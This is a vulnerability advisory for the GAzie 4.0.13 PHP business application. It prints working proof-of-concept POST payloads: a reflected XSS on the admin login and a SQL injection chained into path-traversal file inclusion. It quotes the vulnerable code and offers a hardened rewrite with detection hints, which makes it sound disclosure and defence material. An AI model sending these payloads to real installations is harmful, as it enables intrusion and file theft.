GAzie - Gestione Aziendale v4.0.13
http://sourceforge.net/projects/gazie/
Finance application written in PHP using a MySQL database backend for small to medium enterprises.
It lets you write invoices, manage stock, manage orders, accounting, etc.
It can also send tax receipts to an electronic cash register.
pXSS
http://localhost/gazie/modules/root/login_admin.php
POST
Login=1>'><script>alert(1212)</script>
Password=111111
actionflag=Login
----------------
modules/root/login_admin.php
PHP code:
if (isset ($_POST['actionflag'])) {
    // checkUser();
    // $_POST['Login'] reaches the query helper without any escaping or validation
    $result = gaz_dbi_get_row ($gTables['admin'], "Login", $_POST['Login']);
    if (!empty ($result['lang'])){
        $lang = $result['lang'];
    } else {
        $lang = 'italian';
    }
    // $lang comes straight from the row the query returned, so a row the attacker
    // controls (via the injection below) chooses the file that is included here
    require("./lang.".$lang.".php");
    // remainder of the handler omitted in the advisory
}
library/include/mysql.lib.php
PHP code:
function gaz_dbi_get_row( $table, $fnm, $fval)
{
    global $link;
    // $fval is interpolated into the SQL string as-is; with magic_quotes off the
    // single quote in the Login value closes the literal and the rest is parsed as SQL
    $result = mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'", $link);
    if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error());
    return mysql_fetch_array( $result);
}
SQL injection + LFI (local file inclusion)
Precondition: magic_quotes_gpc = Off
http://localhost/gazie/modules/root/login_admin.php
POST
Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+
Password=111111
actionflag=Login
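A hardened counterpart to the two snippets above, added here as example code and not taken from GAzie itself. It assumes a mysqli connection in $link (the advisory's code uses the old mysql_* extension, which later PHP versions no longer ship) with mysqlnd available for get_result(), an 'admin' table with the 'Login' and 'lang' columns shown in the advisory, and a hypothetical list of shipped lang.*.php files. The three changes map onto the three findings: the lookup value is bound instead of interpolated (SQL injection), the language name is checked against an allowlist before it reaches require() (LFI), and the submitted login is HTML-encoded if it is ever reflected into the form (XSS).

```php
<?php
// Hardened example, not GAzie's own code.
// Assumptions: $link is a mysqli connection; 'admin' has 'Login' and 'lang' columns;
// the identifier and language allowlists below are hypothetical.

// 1. Parameterised lookup. Table and column names cannot be bound as parameters,
//    so they are restricted to a fixed identifier allowlist instead of being
//    interpolated from caller-supplied strings.
function gaz_dbi_get_row_safe(mysqli $link, string $table, string $fnm, string $fval): ?array
{
    $allowed_columns = ['admin' => ['Login', 'id']];   // hypothetical identifier allowlist
    if (!isset($allowed_columns[$table]) || !in_array($fnm, $allowed_columns[$table], true)) {
        throw new InvalidArgumentException('unexpected table/column in gaz_dbi_get_row');
    }
    $stmt = $link->prepare("SELECT * FROM `$table` WHERE `$fnm` = ?");
    if ($stmt === false) {
        throw new RuntimeException('Error gaz_dbi_get_row: ' . $link->error);
    }
    $stmt->bind_param('s', $fval);        // the value travels as data, never as SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// 2. Language allowlist. Even if the database row were attacker-controlled, only a
//    name from this list can reach require(), so the "../" and %00 tricks in the
//    PoC have nothing to act on.
const GAZ_LANGS = ['italian', 'english'];   // hypothetical list of shipped lang.*.php files

function gaz_select_lang(?string $db_lang): string
{
    return in_array($db_lang, GAZ_LANGS, true) ? $db_lang : 'italian';
}

// 3. Output encoding for any value echoed back into the login page.
function gaz_h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if (isset($_POST['actionflag'])) {
    $login  = (string)($_POST['Login'] ?? '');
    $result = gaz_dbi_get_row_safe($link, 'admin', 'Login', $login);
    $lang   = gaz_select_lang($result['lang'] ?? null);
    require "./lang." . $lang . ".php";   // $lang is now always one of GAZ_LANGS
    // If the form is re-rendered with the submitted value, encode it first:
    // echo '<input name="Login" value="' . gaz_h($login) . '">';
}
```

The allowlist in step 2 is worth keeping even after the query is parameterised: the lang column is stored data that an administrator or another code path can change, so the include should never trust it to be a file name. For detection, a login attempt whose Login field contains a single quote followed by SQL keywords, or a path with "../" or a %00 byte, is a clear signal in the web server or application log.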